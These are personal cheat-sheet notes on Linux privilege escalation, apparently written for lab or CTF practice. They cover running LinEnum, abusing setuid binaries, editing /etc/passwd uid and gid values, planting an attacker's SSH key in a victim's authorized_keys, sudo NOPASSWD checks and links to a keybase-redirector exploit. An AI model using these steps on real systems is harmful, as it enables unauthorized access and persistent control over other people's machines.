Linux escalate steps

Goals

• From nobody to user
• From User to root

LinEnum to check vulnerability

Already have shell access

• https://github.com/rebootuser/LinEnum
• wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
• ./LinEnum.sh -t -r LinEnumRpt

From nobody to normal user

Methods

• Can attack using user with same uid and gid as with victim uer in victim PC
• Via NFS root_squash,no_all_squash

To use setuid to execute as a user

• Sample code https://github.com/lethanhtung01011980/Notes/blob/master/runAsOtherLinuxUser.c
• su - frank
• vim runAsOtherLinuxUser.c
• gcc runAsOtherLinuxUser.c -o runAsOtherLinuxUser
• chmod u+s runAsOtherLinuxUser
• In victim PC, ./runAsOtherLinuxUser
• We can edit /etc/passwd to change the uid and gid for a user

Try to generate ssh key to login as a user

• root is attacker user in Kali. frank is victim user in victim PC.
• In attacker, ssh-keygen to generate private / public key with id-frank file name.
• Copy public key of attackers to victim's /home/frank/.ssh/authorized_keys
• Attacker to login as frank: ssh -i /root/.ssh id-frank frank@victim-ip

From user to root

To if can run sudo with "NOPASSWD" aka as root:

• sudo -l
• User frank may run the following commands on this host:
• (frank) NOPASSWD: /opt/logreader/logreader.sh
• (adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c

If see "Vim: Warning: Output is not to a terminal"

• Type ZQ

keybase-redirector PoE

• keybase-redirector PoE: https://hackerone.com/reports/426944 and https://www.exploit-db.com/exploits/46044

Or run LinEnum

• https://github.com/rebootuser/LinEnum
• wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
• ./LinEnum.sh -t -r LinEnumRpt